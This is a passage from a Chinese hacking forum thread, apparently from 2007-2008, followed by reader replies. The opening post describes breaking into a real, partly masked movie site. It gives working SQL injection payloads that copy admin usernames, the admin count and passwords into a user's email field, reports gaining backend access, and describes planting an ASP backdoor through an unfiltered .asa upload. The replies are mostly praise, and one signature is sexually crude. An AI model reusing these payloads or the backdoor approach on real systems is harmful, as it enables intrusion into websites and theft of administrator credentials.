starlook--12 10 2003 2:41PM
nlook---0
nos---2 登陆次数
date--12 10 2003 12:00AM 注册时间?
money--同上
send--空
oklook--0
dnlook--0
getmoney--0
state--0
note--这家伙很。。。 说明

password表
1 2 3
id name pwd

然后我又试ad原来是用来记录广告击点的。。
然后又试password表得到有name和pwd字段。
执行
ffff';update [users] set email=(select top 1 name from password) where name='ffff';--
可得第一个用户名是admin123看样儿多半是管理员了。
然后又得到了密码是dy***dick188还是打星号算了哈哈...

这样我们就完全进入了这个电影网站的后台了哈哈。
http://www.dy***.com/login.asp

再进一步还可以知道管理员一共有三人密码也都能看到了。
ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--

ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--


只是能免费看电影好象还不够哈..我看了看它的后台管理原来在
添加电影的地方对于上传的图片没有过滤.asa的文件,这样我就
能上传一个asp后门并执行.


(全文完)如果有人不明白.......
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 73楼  发表于: 2007-11-17 0
怎么光看没顶啊啊啊啊啊啊啊啊                    
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 74楼  发表于: 2008-01-11 0
看来此帖是沉了。。。。
花香、中寂寞

ZxID:1085167

等级: 派派贵宾
小号
举报 只看该作者 75楼  发表于: 2008-01-11 0
  晕  还有这么好的东东哦  嘿嘿
╲_‘★.原來、激情過後菂莪們"。╱━‘★’━━━芷剩下⒈堆卫笙纸、。愛)‵⒏在㈡腿间.、⒐在錢袋裡╱/╱ ゛性生活.’誰把誰娱樂
awpexpert

ZxID:1269607


等级: 派派贵宾
【反恐精英OL:王者归来电影版】
举报 只看该作者 76楼  发表于: 2008-01-11 0
厉害 学习了
-.愛瘋樂。

ZxID:1334708

等级: 读书识字
   人非商品,何需说明。
举报 只看该作者 77楼  发表于: 2008-01-11 0
狠严重的说
┆  ミ `  灬                                                                    ┆
┆━┏┛┃                                                                      ┆
┊━┏┛┃          :QianG |->Stef< V*:                            ┆
│..┏ ┃┃┃        ┗- ―‥-―‥-―‥- ┛                              │
│━━┛━┛ ▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁..│
└───ˊ我非偀雄.廣目無雙.我夲壞蛋,無限囂張︷.`───┘

           
fzin

ZxID:1195879

等级: 派派新人
举报 只看该作者 78楼  发表于: 2008-02-07 0
謝謝了
awpexpert

ZxID:1269607


等级: 派派贵宾
【反恐精英OL:王者归来电影版】
举报 只看该作者 79楼  发表于: 2008-02-11 0
改天慢慢看
发帖 回复